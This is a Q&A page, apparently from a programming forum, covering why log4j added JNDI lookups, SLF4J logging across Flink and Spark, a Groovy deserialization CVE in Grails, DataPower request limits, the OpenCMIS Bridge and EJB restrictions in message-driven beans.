Recently a 0-day exploit got disclosed, that uses a security vulnerability in log4j which allows unauthorised remote code execution.
I'm wondering, what was the actual reason, why log4j has implemented this JNDI lookups, which have cause the vulnerability at all?
What would be an example for using this LDAP lookup feature in log4j?
Log4j is a popular logging framework used in Java (you can figure the popularity by seeing the widespread impact of the vulnerability). Log4j offers a specific feature, where you can add tokens to your logging string, that get interpolated to fetch specific data. E.g. "%d{dd MMM yyyy}" will insert the date at which the message was logged.
In the mean time JNDI (Java Naming and Directory Interface) is commonly used for sharing configuration settings to multiple (mirco)services.
You can imagine a situation where somebody would like to log configuration settings in e.g. error situations.
See this article explaining a bit
A Java based application can use JNDI + LDAP together to find a Business object containing data that it might need. For example, the following URL ldap://localhost:3xx/o=BusinessObjectID to find and invoke theBusinessObject remotely from an LDAP server running on either a same machine (localhost) on port 3xx or remote machine hosted in a controlled environment and goes on to read attributes from it.
The update it refers to mentions it as "LOG4J2-313: Add JNDILookup plugin." The motivation is found in the Apache JIRA entry
Currently, Lookup plugins [1] don't support JNDI resources.
It would be really convenient to support JNDI resource lookup in the configuration.
One use case with JNDI lookup plugin is as follows:
I'd like to use RoutingAppender [2] to put all the logs from the same web application context in a log file (a log file per web application context).
And, I want to use JNDI resources look up to determine the target route (similarly to JNDI context selector of logback [3]).
Determining the target route by JNDI lookup can be advantageous because we don't have to add any code to set properties for the thread context and JNDI lookup should always work even in a separate thread without copying thread context variables.
[1] http://logging.apache.org/log4j/2.x/manual/lookups.html
[2] http://logging.apache.org/log4j/2.x/manual/appenders.html#RoutingAppender
[3] http://logback.qos.ch/manual/contextSelector.html
The big problem with log4j, is that by default all string interpolation of all modules is turned on. In the mean time it has become opt-out, but it wasn't always.
Related
I am writing some codes which are supposed to run (as jar) on both flink and spark platforms. However, these two platforms use different log APIs. (flink uses log4j as logging framework, but slf4j as API) In this case, what is the best practice to log in the common codes ?
I tried with Log4j2 API in these common codes, but it cannot log anything in flink.
My idea now would be trying to get the logging context with log4j API from the slf4j context (which is already launched by flink), is that correct?
Thanks
Definitely a safe way to go would be to use SLF4J from a shared common library.
Since SLF4J is a logging facade, you don't have to force your users to use the same logging framework you're using in your library. See the user manual to this point:
Authors of widely-distributed components and libraries may code
against the SLF4J interface in order to avoid imposing an logging
framework on their end-user. Thus, the end-user may choose the desired
logging framework at deployment time by inserting the corresponding
slf4j binding on the classpath, which may be changed later by
replacing an existing binding with another on the class path and
restarting the application. This approach has proven to be simple and
very robust.
A security flaw in Groovy was detected in versions 1.7 to 2.4.3:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3253
The MethodClosure class in runtime/MethodClosure.java in Apache Groovy 1.7.0 through 2.4.3 allows remote attackers to execute arbitrary code or cause a denial of service via a crafted serialized object.
Does this affect "typical" Grails projects that retrieve data from user input (web forms), the DB, web services, etc. and assume this is all text, not serialized objects? In other words, is there any of this happening implicitly that we should be aware of?
Otherwise, what should we look for to ensure this bug isn't affecting us?
Grame has an issue for exactly this, but noone has been able to show any way to exploit it in a Grails app yet: https://github.com/grails/grails-core/issues/9113
In short: "the plan is 2.5.1 and 3.0.4 will have Groovy 2.4.4"
We have some soap based web services using java to wsdl approach in our organization. There is a security requirement to now fix limits on the request parameters being passed to service methods. Currently we have the maxoccurs attribute for a parameter to be unbounded in wsdl because we have the parameter as a collection in java.
To resolve this it looks like we need to make some changes in java source to regenerate the WSDL's which are compliant to this requirement. I know there are some unofficial api's available which can be used as replacement to jaxb providing annotations which can be added in java source. This may result in WSDL generated having maxoccurs to a fixed configured value. But, there are some issues in using these third party solutions due to licensing and other issues. Also, we need to enable schema validation for the WSDL.
I would like to know if there is a solution to have this check done outside the scope of either the WSDL or java source to be compliant with this requirement. What I am looking at is a configurable solution without touching wsdl's or java source. We are using IBM Datapower in our organization. Want to have if we can have a policy or something configured using datapower that will intercept the web service request parameters and throw fault if the maxoccurs for any of the web service method parameters is above a configured value.
Has anyone used datapower for a use case like this. Or is there a better way of achieving it.
I believe you can limit the maximum length of messages. This will actually be better than a WSDL limit for preventing DDOS as it will happen in the network layer.
I just noticed this project at Apache OpenCMIS:
https://svn.apache.org/repos/asf/chemistry/opencmis/trunk/chemistry-opencmis-bridge
There is no description, no documentation, and reading the code does not give many hints about what it is supposed to do.
Apache OpenCMIS sometimes releases great software silently, with little communication, so we might be missing another great piece of software here.
A Google Search for "OpenCMIS Bridge" returns only source code and the bare download page.
The OpenCMIS Bridge works like a proxy server. It accepts CMIS requests and forwards them to a CMIS server. On the way it can change the binding, and filter, enrich and federate data.
Here are few use cases:
If a repository does not support the CMIS 1.1 browser binding, you can put the OpenCMIS Bridge in front of it. The bridge then could talk JSON to the client and AtomPub to the server. The client wouldn't notice that the server doesn't support the browser binding.
Code can be added to the bridge to redact property values or filter whole objects when they are transferred through the bridge. That could add another level of security that the native repository doesn't support.
Code can also be added to add or enrich object data. For example, property values could be translated from cryptic codes into readable values. Virtual secondary types can be added on the fly. Or additional renditions could be provided.
The bridge can also be used to provide different views of multiple repositories. Repositories of different vendors can be access through one unified endpoint. It's possible to build one virtual repository across multiple backend repositories that then, for example, allows a federated query across all backends.
The OpenCMIS Bridge is only a framework, though. It just provides the infrastructure and the hooks to add your own code and rules.
If you are looking for a real world application, check SAP Document Center (formerly "SAP Mobile Documents"). It is based on the OpenCMIS Bridge.
In a Message-Driven Bean am I restricted to the same rules of Session Beans (EJB3 or EJB3.1), i.e:
use the java.lang.reflect Java Reflection API to access information unavailable by way of the security rules of the Java runtime environment
read or write nonfinal static fields
use this to refer to the instance in a method parameter or result
access packages (and classes) that are otherwise made unavailable by the rules of Java programming language
define a class in a package
use the java.awt package to create a user interface
create or modify class loaders and security managers
redirect input, output, and error streams
obtain security policy information for a code source
access or modify the security configuration objects
create or manage threads
use thread synchronization primitives to synchronize access with other enterprise bean instances
stop the Java virtual machine
load a native library
listen on, accept connections on, or multicast from a network socket
change socket factories in java.net.Socket or java.net.ServerSocket, or change the stream handler factory of java.net.URL.
directly read or write a file descriptor
create, modify, or delete files in the filesystem
use the subclass and object substitution features of the Java serialization protocol
It is always a good idea not to create threads manually (ExecutorService seems fine in some cases though).
Actually MDBs are very often used to address this limitation: instead of creating a separate thread, send some task object (put something like MyJob extends Serializable in ObjectMessage) into the queue and let it be executed in MDB thread pool. This approach is much more heavyweight but scales very well and you don't have to manage any threads manually. In this scenario JMS is just a fancy way of running jobs asynchronously.
These EJB restrictions are typically not hard restrictions. In fact, they're not caveats on making your EJBs work properly, they're more like advisories on how to make your EJBs portable across EJB containers.
From time to time, some very fussy EJB container providers (cough.... WebSphere... cough) will actually enforce these restrictions through java security policies, but I would say about half of those restrictions are routinely ignored ( I mean just using log4j in your MDB potentially violates about 30% of them).
Violating the the other 70% probably indicates some architectural or design problem.
So, can you call System.exit() in an MDB ? The answer is yes, but only once... :)
It sounds like, in your case, you need some of these restrictions to reign in potentially misbehaving plugins. I don't know if MDBs are going to get you out of that problem. I suppose it depends on how much you trust the third party developers, but rather than use the invocation based models in EJB, I would install the components as JMX ModelMBeans. You can use the java security model to limit what they can do, but I suppose that would defeat the purpose.
Perhaps using some run (or load) time AOP byte code engineering, you could rewrite all requests for threads to be redirected to a per component thread factory that you allocate and limits the threads that can be created. Because you don't want to stop them from doing whatever it is that they do, you just don't want them to take down the whole server when they crash/stall/misbehave.
Interesting problem.